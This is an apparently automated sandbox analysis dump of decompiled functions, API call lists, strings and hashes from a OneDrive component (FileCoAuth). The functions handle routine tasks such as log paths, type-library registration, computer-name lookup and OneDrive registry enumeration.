				__imp__SHGetSpecialFolderPathW(0, _t29, 0x23, 0, (_t22 & 0xffffff00 | __ecx != 0x00000000) & 0x000000ff, L"d:\\dbs\\sh\\odib\\0313_155253\\cmd\\17\\client\\onedrive\\product\\ux\\shared\\watsonreport.cpp", 0x117, L"WatsonReport::GetSetupLogsLocation", L"(pSetupLogsLocation != NULL)", L"Expected non-NULL setup log location", 0x2c4);
				_t68 = _t29 - 1;
				if(_t29 == 1) {
					memset(_t62 - 0x2b8, 0, 0x98);
					_t50 = _t62 - 0x2b8;
					E00E97773(0, _t50, _t59, 0x80004005, _t68);
					 *((char*)(_t62 - 4)) = 1;
					E00E99F8B(0, _t59, _t61, _t68);
					E00E990AD(_t59, E00E9817A(_t62 - 0x2b8, _t62 - 0x2d0));
					E00E94307(_t62 - 0x2d0, 1, 0);
					_t61 = 0;
					E00E97DF8();
					__imp__??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ(E00E99D69(0, E00E97EF0(0, _t59, 0x80004005, _t68), _t59, 0x80004005, _t68), _t62 - 0x2b8, _t62 - 0x218, _t50, 0xeb1b1c, 2, 1);
				}
				E00E98588();
				return E00EA3152(0, _t59, _t61);
			}








    0x00e9a6a6
    0x00e9a6ab
    0x00e9a6ba
    0x00e9a6c0
    0x00e9a6d6
    0x00e9a6ea
    0x00e9a6f1
    0x00e9a6fb
    0x00e9a70a
    0x00e9a712
    0x00e9a71d
    0x00e9a723
    0x00e9a726
    0x00e9a739
    0x00e9a741
    0x00e9a74b
    0x00e9a75c
    0x00e9a776
    0x00e9a790
    0x00e9a79e
    0x00e9a7a9
    0x00e9a7ab
    0x00e9a7b6
    0x00e9a7b6
    0x00e9a7c2
    0x00e9a7ce

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9A6A6
      • Part of subcall function 00E982B9: GetLastError.KERNEL32(BB40E64E,?,?,?,?,?,00EA3B19,000000FF,?,00E967F9,?,d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\win32api.cpp,000001D1,Win32Api::TaskDialogIndirect,pTaskConfig != NULL,pTaskConfig was NULL), ref: 00E98313
      • Part of subcall function 00E982B9: memset.MSVCR120 ref: 00E98329
      • Part of subcall function 00E982B9: memset.MSVCR120 ref: 00E98369
      • Part of subcall function 00E982B9: _vsnwprintf.MSVCR120 ref: 00E98385
    • memset.MSVCR120 ref: 00E9A70A
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000023,00000000,00E991C2,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,?,?,00000000), ref: 00E9A71D
    • memset.MSVCR120 ref: 00E9A739
      • Part of subcall function 00E97773: __EH_prolog3.LIBCMT ref: 00E9777A
      • Part of subcall function 00E97773: ??0?$basic_ios@_WU?$char_traits@_W@std@@@std@@IAE@XZ.MSVCP120(00000008,00E9833E,00000002,00000001), ref: 00E97797
      • Part of subcall function 00E97773: ??0?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAE@PAV?$basic_streambuf@_WU?$char_traits@_W@std@@@1@_N@Z.MSVCP120(?,00000000,00000000,00000008,00E9833E,00000002,00000001), ref: 00E977AF
      • Part of subcall function 00E97EF0: __EH_prolog3_catch.LIBCMT ref: 00E97EF7
      • Part of subcall function 00E97EF0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00E98084
      • Part of subcall function 00E99D69: __EH_prolog3_catch.LIBCMT ref: 00E99D70
      • Part of subcall function 00E99D69: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000000,00000000,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99F75
      • Part of subcall function 00E99F8B: __EH_prolog3_catch.LIBCMT ref: 00E99F92
      • Part of subcall function 00E99F8B: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000,?,00EB1B1C,00000002,00000001), ref: 00E9A0E4
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120(00000001,00000000,00000000,?,00000000,?,?,00EB1B1C,00000002,00000001), ref: 00E9A7B6
    Strings
    • d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\watsonreport.cpp, xrefs: 00E9A6E4
    • WatsonReport::GetSetupLogsLocation, xrefs: 00E9A6CF
    • (pSetupLogsLocation != NULL), xrefs: 00E9A6CA
    • WatsonReport::GetSetupLogsLocation, xrefs: 00E9A6B5
    • Expected non-NULL setup log location, xrefs: 00E9A6C5
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: U?$char_traits@_$W@std@@@std@@$memset$?setstate@?$basic_ios@_H_prolog3_catch$??0?$basic_ios@_??0?$basic_ostream@_??1?$basic_ios@_??3@ErrorFolderH_prolog3H_prolog3_LastPathSpecialV?$basic_streambuf@_W@std@@@1@__vsnwprintf
    • String ID: (pSetupLogsLocation != NULL)$Expected non-NULL setup log location$WatsonReport::GetSetupLogsLocation$WatsonReport::GetSetupLogsLocation$d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\watsonreport.cpp
    • API String ID: 3049488461-3718693666
    • Opcode ID: 23241dac64a8b155c7002a1ec5878989389e175af70ff4b561b19c3ab83a3f2f
    • Instruction ID: ae865fef3edac0fba760981f7cb8a63b19f657d58feae15153a550d50b933320
    • Opcode Fuzzy Hash: 23241dac64a8b155c7002a1ec5878989389e175af70ff4b561b19c3ab83a3f2f
    • Instruction Fuzzy Hash: D7215671A803186ADF54EB70CD8AFEE73AD9F29700F005599B109B61D2EE749F89CB50
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9A0FC, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 65COMMON
    Download Yara Rule
    C-Code - Quality: 24%
    			E00E9A0FC(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t22;
				intOrPtr _t23;
				void* _t26;
				intOrPtr* _t32;
				signed int _t36;
				signed int _t46;
				void* _t49;

				E00EA3194(E00EA3DA7, __ebx, __edi, __esi);
				_t32 = __ecx;
				_t48 = 0;
				__imp__??0_Lockit@std@@QAE@H@Z(0, 0x18);
				 *((intOrPtr*)(_t49 - 4)) = 0;
				_t22 =  *0xeb2344;
				 *(_t49 - 0x18) = _t22;
				__imp__??Bid@locale@std@@QAEIXZ();
				_t46 = _t22;
				_t23 =  *__ecx;
				if(_t46 >=  *((intOrPtr*)(_t23 + 0xc))) {
					_t36 = 0;
				} else {
					_t36 =  *( *((intOrPtr*)(_t23 + 8)) + _t46 * 4);
				}
				if(_t36 != 0 ||  *((intOrPtr*)(_t23 + 0x14)) == _t36) {
					_t48 = _t36;
				} else {
					__imp__?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ();
					if(_t46 <  *((intOrPtr*)(_t23 + 0xc))) {
						_t48 =  *( *((intOrPtr*)(_t23 + 8)) + _t46 * 4);
					}
				}
				if(_t48 == 0) {
					_t48 =  *(_t49 - 0x18);
					if( *(_t49 - 0x18) == 0) {
						_t26 = _t49 - 0x18;
						__imp__?_Getcat@?$ctype@_W@std@@SAIPAPBVfacet@locale@2@PBV42@@Z(_t26, _t32);
						if(_t26 == 0xffffffff) {
							__imp__??0bad_cast@std@@QAE@PBD@Z("bad cast");
							_push(0xeadb70);
							_push(_t49 - 0x24);
							L00EA3138();
						}
						_t48 =  *(_t49 - 0x18);
						 *0xeb2344 = _t48;
						E00EA35D7( *((intOrPtr*)( *_t48 + 4))(), _t48);
					}
				}
				__imp__??1_Lockit@std@@QAE@XZ();
				return E00EA3152(_t32, _t46, _t48);
			}










    0x00e9a103
    0x00e9a108
    0x00e9a10a
    0x00e9a110
    0x00e9a116
    0x00e9a119
    0x00e9a124
    0x00e9a127
    0x00e9a12d
    0x00e9a12f
    0x00e9a134
    0x00e9a13e
    0x00e9a136
    0x00e9a139
    0x00e9a139
    0x00e9a142
    0x00e9a15c
    0x00e9a149
    0x00e9a149
    0x00e9a152
    0x00e9a157
    0x00e9a157
    0x00e9a152
    0x00e9a160
    0x00e9a162
    0x00e9a167
    0x00e9a169
    0x00e9a16e
    0x00e9a179
    0x00e9a183
    0x00e9a189
    0x00e9a191
    0x00e9a192
    0x00e9a192
    0x00e9a197
    0x00e9a19c
    0x00e9a1a8
    0x00e9a1ad
    0x00e9a167
    0x00e9a1b1
    0x00e9a1be

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9A103
    • ??0_Lockit@std@@QAE@H@Z.MSVCP120(00000000,00000018,00E99E0C,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E9A110
    • ??Bid@locale@std@@QAEIXZ.MSVCP120(?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E9A127
    • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP120(?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E9A149
    • ?_Getcat@?$ctype@_W@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP120(?,?,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E9A16E
    • ??0bad_cast@std@@QAE@PBD@Z.MSVCR120(bad cast,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E9A183
    • _CxxThrowException.MSVCR120(?,00EADB70), ref: 00E9A192
    • std::_Facet_Register.LIBCPMT ref: 00E9A1A8
    • ??1_Lockit@std@@QAE@XZ.MSVCP120(?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E9A1B1
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Lockit@std@@$??0_??0bad_cast@std@@??1_Bid@locale@std@@ExceptionFacet_Getcat@?$ctype@_Getgloballocale@locale@std@@H_prolog3_Locimp@12@RegisterThrowV42@@Vfacet@locale@2@W@std@@std::_
    • String ID: bad cast
    • API String ID: 2931621279-3145022300
    • Opcode ID: 2db2441297426bf31e9e2c09719d678a2b8e2c22c265655f95e9ad73c32c1997
    • Instruction ID: eb50a3a70d5d55acb5034382c81b73417c92a04d1f2f94163c903143eaae0638
    • Opcode Fuzzy Hash: 2db2441297426bf31e9e2c09719d678a2b8e2c22c265655f95e9ad73c32c1997
    • Instruction Fuzzy Hash: A821C6B5A022118FCF14DF65D8558AD77B1EF4E320B191169E501BB3A0CB30BD05CBE1
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E92965, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 114libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 37%
    			E00E92965(void* __ecx, intOrPtr* __edx, void* __eflags, signed int* _a4) {
				signed int _v0;
				signed int _v8;
				short _v10;
				signed int _v12;
				char _v528;
				void* _v532;
				char _v536;
				void* _v540;
				signed int _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				intOrPtr* _t53;
				intOrPtr* _t57;
				void* _t58;
				_Unknown_base(*)()* _t59;
				struct HINSTANCE__* _t61;
				signed int _t62;
				void* _t67;
				signed int* _t68;
				WCHAR* _t76;
				void* _t77;
				WCHAR* _t78;
				intOrPtr* _t80;
				signed int _t86;
				void* _t87;
				signed int _t91;
				void* _t93;
				void* _t95;
				WCHAR* _t96;
				void* _t99;
				intOrPtr* _t101;
				char* _t103;
				void* _t104;
				intOrPtr* _t105;
				signed int _t108;
				signed int _t109;

				_t89 = __edx;
				_t48 =  *0xeb0090; // 0xbb40e64e
				_v8 = _t48 ^ _t109;
				_push(_t93);
				_t103 = 0;
				_v536 = 0;
				_v532 = 0;
				if(E00E923DD(__ecx, __edx, _t93,  &_v536,  &_v532) < 0) {
					L16:
					_t53 = _v532;
					if(_t53 != 0) {
						 *((intOrPtr*)( *_t53 + 8))(_t53);
					}
					__imp__#6(_v536);
					_pop(_t95);
					_pop(_t104);
					return E00EA29F2(_t77, _v8 ^ _t109, _t89, _t95, _t104);
				} else {
					_t57 = _v532;
					_t89 =  &_v540;
					_v540 = 0;
					_t58 =  *((intOrPtr*)( *_t57 + 0x24))(_t57, 0xffffffff, 0, 0, 0, _t89);
					if(_t58 < 0 || _v540 == 0) {
						L11:
						if( *0xeb2330 != 1) {
							L14:
							_t59 = __imp__#163;
						} else {
							_t61 = GetModuleHandleW(L"OLEAUT32.DLL");
							if(_t61 == 0) {
								goto L14;
							} else {
								_t59 = GetProcAddress(_t61, "RegisterTypeLibForUser");
								if(_t59 == 0) {
									goto L14;
								}
							}
						}
						 *_t59(_v532, _v536, _t103);
						__imp__#6(_v540);
						goto L16;
					} else {
						__imp__#7(_v540, _t77);
						_t62 =  &_v528;
						__imp__wcsncpy_s(_t62, 0x104, _v540, _t58);
						_t86 = _t62;
						L00E91E60(_t86);
						_t96 =  &_v528;
						_t78 = _t96;
						_v10 = 0;
						if(_v528 != 0) {
							do {
								_t76 = CharNextW(_t78);
								_t86 =  *_t78 & 0x0000ffff;
								if(_t86 == 0x5c || _t86 == 0x2f || _t86 == 0x3a) {
									_t96 = _t76;
								}
								_t78 = _t76;
							} while ( *_t76 != _t103);
						}
						_t99 = (_t96 -  &_v528 >> 1) + (_t96 -  &_v528 >> 1);
						_pop(_t77);
						if(_t99 >= 0x208) {
							E00EA2D1C();
							asm("int3");
							_push(_t109);
							_push(_t86);
							_v584 = _t86;
							_push(_t77);
							_push(_t103);
							_t105 = _t89;
							_push(_t99);
							if(_t86 == 0 || _t105 == 0) {
								_t67 = 0x80070057;
							} else {
								_t68 = _a4;
								if(_t68 != 0) {
									_t101 = _v0;
									if( *_t101 != 0 ||  *((intOrPtr*)(_t101 + 4)) != 0 ||  *((intOrPtr*)(_t101 + 8)) != 0xc0 ||  *((intOrPtr*)(_t101 + 0xc)) != 0x46000000) {
										while(1) {
											_t80 =  *((intOrPtr*)(_t105 + 8));
											if(_t80 == 0) {
												break;
											}
											_t91 = 0 |  *_t105 == 0x00000000;
											_v0 = _t91;
											if(_t91 != 0) {
												L33:
												if(_t80 == 1) {
													goto L28;
												} else {
													_t87 =  *_t80(_t86, _t101, _t68,  *((intOrPtr*)(_t105 + 4)));
													if(_t87 == 0) {
														goto L29;
													} else {
														if(_v0 != 0 || _t87 >= 0) {
															goto L37;
														} else {
															L40:
															 *_a4 =  *_a4 & 0x00000000;
															_t67 = _t87;
														}
													}
												}
											} else {
												if(E00E91E21( *_t105, _t101) == 0) {
													L37:
													_t68 = _a4;
													_t105 = _t105 + 0xc;
													_t86 = _v12;
													continue;
												} else {
													_t68 = _a4;
													_t86 = _v12;
													goto L33;
												}
											}
											goto L42;
										}
										_t87 = 0x80004002;
										goto L40;
									} else {
										L28:
										_t108 =  *((intOrPtr*)(_t105 + 4)) + _t86;
										 *((intOrPtr*)( *_t108 + 4))(_t108);
										 *_a4 = _t108;
										L29:
										_t67 = 0;
									}
								} else {
									_t67 = 0x80004003;
								}
							}
							L42:
							return _t67;
						} else {
							_t103 =  &_v528;
							 *((short*)(_t109 + _t99 - 0x20c)) = 0;
							goto L11;
						}
					}
				}
			}









































    0x00e92965
    0x00e92970
    0x00e92977
    0x00e9297b
    0x00e92982
    0x00e9298b
    0x00e92992
    0x00e929a1
    0x00e92ab5
    0x00e92ab5
    0x00e92abd
    0x00e92ac2
    0x00e92ac2
    0x00e92acb
    0x00e92ad6
    0x00e92ad9
    0x00e92ae2
    0x00e929a7
    0x00e929a7
    0x00e929ad
    0x00e929b7
    0x00e929c2
    0x00e929c7
    0x00e92a6b
    0x00e92a72
    0x00e92a93
    0x00e92a93
    0x00e92a74
    0x00e92a79
    0x00e92a81
    0x00000000
    0x00e92a83
    0x00e92a89
    0x00e92a91
    0x00000000
    0x00000000
    0x00e92a91
    0x00e92a81
    0x00e92aa5
    0x00e92aaf
    0x00000000
    0x00e929d9
    0x00e929e0
    0x00e929ed
    0x00e929f9
    0x00e92a02
    0x00e92a04
    0x00e92a0b
    0x00e92a11
    0x00e92a13
    0x00e92a1e
    0x00e92a20
    0x00e92a21
    0x00e92a27
    0x00e92a2d
    0x00e92a39
    0x00e92a39
    0x00e92a3b
    0x00e92a3d
    0x00e92a20
    0x00e92a4c
    0x00e92a4e
    0x00e92a55
    0x00e92ae3
    0x00e92ae8
    0x00e92aeb
    0x00e92aee
    0x00e92aef
    0x00e92af2
    0x00e92af3
    0x00e92af4
    0x00e92af6
    0x00e92af9
    0x00e92ba9
    0x00e92b07
    0x00e92b07
    0x00e92b0c
    0x00e92b18
    0x00e92b1e
    0x00e92b93
    0x00e92b93
    0x00e92b98
    0x00000000
    0x00000000
    0x00e92b50
    0x00e92b53
    0x00e92b58
    0x00e92b6d
    0x00e92b70
    0x00000000
    0x00e92b72
    0x00e92b7a
    0x00e92b7e
    0x00000000
    0x00e92b80
    0x00e92b84
    0x00000000
    0x00e92b9f
    0x00e92b9f
    0x00e92ba2
    0x00e92ba5
    0x00e92ba5
    0x00e92b84
    0x00e92b7e
    0x00e92b5a
    0x00e92b65
    0x00e92b8a
    0x00e92b8a
    0x00e92b8d
    0x00e92b90
    0x00000000
    0x00e92b67
    0x00e92b67
    0x00e92b6a
    0x00000000
    0x00e92b6a
    0x00e92b65
    0x00000000
    0x00e92b58
    0x00e92b9a
    0x00000000
    0x00e92b38
    0x00e92b38
    0x00e92b3b
    0x00e92b40
    0x00e92b46
    0x00e92b48
    0x00e92b48
    0x00e92b48
    0x00e92b0e
    0x00e92b0e
    0x00e92b0e
    0x00e92b0c
    0x00e92bae
    0x00e92bb4
    0x00e92a5b
    0x00e92a5d
    0x00e92a63
    0x00000000
    0x00e92a63
    0x00e92a55
    0x00e929c7

    APIs
      • Part of subcall function 00E923DD: GetModuleFileNameW.KERNEL32(?,?,00000104,?), ref: 00E92424
    • #7.OLEAUT32(?), ref: 00E929E0
    • wcsncpy_s.MSVCR120 ref: 00E929F9
    • CharNextW.USER32(?), ref: 00E92A21
    • GetModuleHandleW.KERNEL32(OLEAUT32.DLL), ref: 00E92A79
    • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00E92A89
    • #6.OLEAUT32(?), ref: 00E92AAF
    • #6.OLEAUT32(?,?,?), ref: 00E92ACB
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Module$AddressCharFileHandleNameNextProcwcsncpy_s
    • String ID: OLEAUT32.DLL$RegisterTypeLibForUser
    • API String ID: 1786792091-2666564778
    • Opcode ID: 786d2322b70b3b60198d1959d63743b9e27ec45ceda481c6981ee3c54bac89ed
    • Instruction ID: 32d08df41beea796ff9b8b9da709d2536cc76845cdf23c32a1f78b99751be9eb
    • Opcode Fuzzy Hash: 786d2322b70b3b60198d1959d63743b9e27ec45ceda481c6981ee3c54bac89ed
    • Instruction Fuzzy Hash: 2941C672A0022DAFCF309B65CC8CADA7BB9EF49314F044699E519B7150DA709E85CF90
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E96902, Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 73COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00E982B9: GetLastError.KERNEL32(BB40E64E,?,?,?,?,?,00EA3B19,000000FF,?,00E967F9,?,d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\win32api.cpp,000001D1,Win32Api::TaskDialogIndirect,pTaskConfig != NULL,pTaskConfig was NULL), ref: 00E98313
      • Part of subcall function 00E982B9: memset.MSVCR120 ref: 00E98329
      • Part of subcall function 00E982B9: memset.MSVCR120 ref: 00E98369
      • Part of subcall function 00E982B9: _vsnwprintf.MSVCR120 ref: 00E98385
    • memset.MSVCR120 ref: 00E9695C
    • GetComputerNameExW.KERNEL32(00000001,?,00000040), ref: 00E96978
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: memset$ComputerErrorLastName_vsnwprintf
    • String ID: (result != 0) && (buffer[0] != 'L\0')$@$Couldn't get computer name.$Null argument: pComputerName$Win32Api::GetComputerNameW$d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\win32api.cpp$pComputerName != NULL
    • API String ID: 2237044859-3925666673
    • Opcode ID: 18c88fb24d84b3ec6baf5797581d397d8eaade2c1e1474b3e63fa20b502546a6
    • Instruction ID: a13b1344e842a14a7918886c73e42990076b959e73e897350fe3700ffcaac93a
    • Opcode Fuzzy Hash: 18c88fb24d84b3ec6baf5797581d397d8eaade2c1e1474b3e63fa20b502546a6
    • Instruction Fuzzy Hash: 3311DA72A443407BDA10EB759C46F6B77DCEBCAB10F00651AB684FB181EA74E90487B6
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9D143, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 181registryCOMMON
    Download Yara Rule
    C-Code - Quality: 91%
    			E00E9D143(void* __ebx, int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed short _t80;
				signed short _t84;
				int _t97;
				intOrPtr* _t121;
				void* _t147;
				long _t149;
				int _t151;
				void* _t152;

				_t147 = __edx;
				_push(0x6c);
				E00EA3194(E00EA481D, __ebx, __edi, __esi);
				_t151 = __ecx;
				 *((intOrPtr*)(_t152 - 0x78)) = __ecx;
				_t79 =  >=  ?  *0xeb1368 : 0xeb1368;
				_t121 = 0;
				_t80 = RegOpenKeyExW(0x80000001,  >=  ?  *0xeb1368 : 0xeb1368, 0, 0x20119, _t152 - 0x60);
				_t149 = 0x80070000;
				_t126 =  <=  ? _t80 : _t80 & 0x0000ffff | 0x80070000;
				_t156 =  <=  ? _t80 : _t80 & 0x0000ffff | 0x80070000;
				if(( <=  ? _t80 : _t80 & 0x0000ffff | 0x80070000) < 0) {
					L13:
					return E00EA3152(_t121, _t149, _t151);
				}
				 *(_t152 - 0x64) = 0;
				 *(_t152 - 0x5c) = 0;
				_t84 = RegQueryInfoKeyW( *(_t152 - 0x60), 0, 0, 0, _t152 - 0x64, _t152 - 0x5c, 0, 0, 0, 0, 0, 0);
				_t129 =  <=  ? _t84 : _t84 & 0x0000ffff | 0x80070000;
				_t158 =  <=  ? _t84 : _t84 & 0x0000ffff | 0x80070000;
				if(( <=  ? _t84 : _t84 & 0x0000ffff | 0x80070000) < 0) {
					L12:
					RegCloseKey( *(_t152 - 0x60));
					goto L13;
				}
				_t121 = _t151 + 0x1c;
				E00E9E4BB(_t84,  *_t121,  *((intOrPtr*)(_t121 + 4)));
				 *((intOrPtr*)(_t121 + 4)) =  *_t121;
				E00E94E9D(_t152 - 0x40, L"MainAccount");
				 *(_t152 - 4) =  *(_t152 - 4) & 0x00000000;
				E00E94E9D(_t152 - 0x28, L"Software\\Microsoft\\OneDrive");
				 *(_t152 - 4) = 1;
				E00E9F290(0x80000001, _t152 - 0x28, _t152 - 0x40, 0, _t151 + 0x28);
				 *(_t152 - 4) = 0;
				E00E94307(_t152 - 0x28, 1, 0);
				 *(_t152 - 4) =  *(_t152 - 4) | 0xffffffff;
				E00E94307(_t152 - 0x40, 1, 0);
				_t97 =  *(_t152 - 0x5c) + 1;
				_t151 = 0;
				 *(_t152 - 0x5c) = _t97;
				while(1) {
					_t160 = _t151 -  *(_t152 - 0x64);
					if(_t151 >=  *(_t152 - 0x64)) {
						goto L12;
					}
					 *(_t152 - 0x74) =  *(_t152 - 0x74) & 0x00000000;
					 *(_t152 - 0x34) =  *(_t152 - 0x34) & 0x00000000;
					 *(_t152 - 0x30) =  *(_t152 - 0x30) & 0x00000000;
					 *(_t152 - 0x2c) =  *(_t152 - 0x2c) & 0x00000000;
					_push(_t152 - 0x74);
					_push(_t97);
					E00E9E365(_t121, _t152 - 0x34, _t149, _t151, _t160);
					 *(_t152 - 4) = 2;
					 *(_t152 - 0x70) =  *(_t152 - 0x5c);
					_t149 = RegEnumKeyExW( *(_t152 - 0x60), _t151,  *(_t152 - 0x34), _t152 - 0x70, 0, 0, 0, 0);
					if(_t149 >= 0) {
						E00E94E9D(_t152 - 0x28,  *(_t152 - 0x34));
						 *(_t152 - 4) = 3;
						if(E00E99650(_t152 - 0x28, 0,  *((intOrPtr*)(_t152 - 0x18)), L"Tenants", E00E94E74(L"Tenants")) != 0) {
							 *(_t152 - 0x6c) =  *(_t152 - 0x6c) & 0x00000000;
							 *(_t152 - 0x68) =  *(_t152 - 0x68) & 0x00000000;
							 *(_t152 - 4) = 5;
							E00E9D36E(_t121,  *((intOrPtr*)(_t152 - 0x78)), _t147, _t149, _t151, __eflags,  *(_t152 - 0x60), _t152 - 0x28, _t152 - 0x6c);
							_push(_t152 - 0x6c);
							E00E9EB0A(_t121, _t121);
							 *(_t152 - 4) = 3;
							_t143 =  *(_t152 - 0x68);
							__eflags =  *(_t152 - 0x68);
							if( *(_t152 - 0x68) != 0) {
								E00E92DF6(_t143);
							}
						} else {
							_t115 =  >=  ?  *((void*)(_t152 - 0x28)) : _t152 - 0x28;
							E00E94E9D(_t152 - 0x58,  >=  ?  *((void*)(_t152 - 0x28)) : _t152 - 0x28);
							 *(_t152 - 4) = 4;
							E00E9EE8E( *(_t152 - 0x60), _t152 - 0x58, 0);
							 *(_t152 - 4) = 3;
							E00E94307(_t152 - 0x58, 1, 0);
						}
						 *(_t152 - 4) = 2;
						E00E94307(_t152 - 0x28, 1, 0);
					}
					 *(_t152 - 4) =  *(_t152 - 4) | 0xffffffff;
					E00E98AA7(_t152 - 0x34);
					_t151 = _t151 + 1;
					if(_t149 < 0) {
						goto L12;
					} else {
						_t97 =  *(_t152 - 0x5c);
						continue;
					}
				}
				goto L12;
			}











    0x00e9d143
    0x00e9d143
    0x00e9d14a
    0x00e9d14f
    0x00e9d151
    0x00e9d164
    0x00e9d16b
    0x00e9d179
    0x00e9d182
    0x00e9d18b
    0x00e9d18e
    0x00e9d190
    0x00e9d368
    0x00e9d36d
    0x00e9d36d
    0x00e9d19f
    0x00e9d1a6
    0x00e9d1b0
    0x00e9d1bd
    0x00e9d1c0
    0x00e9d1c2
    0x00e9d35f
    0x00e9d362
    0x00000000
    0x00e9d362
    0x00e9d1c8
    0x00e9d1d2
    0x00e9d1e1
    0x00e9d1e4
    0x00e9d1e9
    0x00e9d1f5
    0x00e9d1fa
    0x00e9d211
    0x00e9d216
    0x00e9d221
    0x00e9d226
    0x00e9d231
    0x00e9d239
    0x00e9d23a
    0x00e9d23c
    0x00e9d23f
    0x00e9d23f
    0x00e9d242
    0x00000000
    0x00000000
    0x00e9d248
    0x00e9d24f
    0x00e9d253
    0x00e9d257
    0x00e9d25b
    0x00e9d25c
    0x00e9d260
    0x00e9d265
    0x00e9d26f
    0x00e9d289
    0x00e9d28d
    0x00e9d299
    0x00e9d29e
    0x00e9d2c2
    0x00e9d2fc
    0x00e9d300
    0x00e9d304
    0x00e9d316
    0x00e9d320
    0x00e9d321
    0x00e9d326
    0x00e9d32a
    0x00e9d32d
    0x00e9d32f
    0x00e9d331
    0x00e9d331
    0x00e9d2c4
    0x00e9d2ce
    0x00e9d2d3
    0x00e9d2d8
    0x00e9d2e5
    0x00e9d2ea
    0x00e9d2f5
    0x00e9d2f5
    0x00e9d336
    0x00e9d341
    0x00e9d341
    0x00e9d346
    0x00e9d34d
    0x00e9d352
    0x00e9d355
    0x00000000
    0x00e9d357
    0x00e9d357
    0x00000000
    0x00e9d357
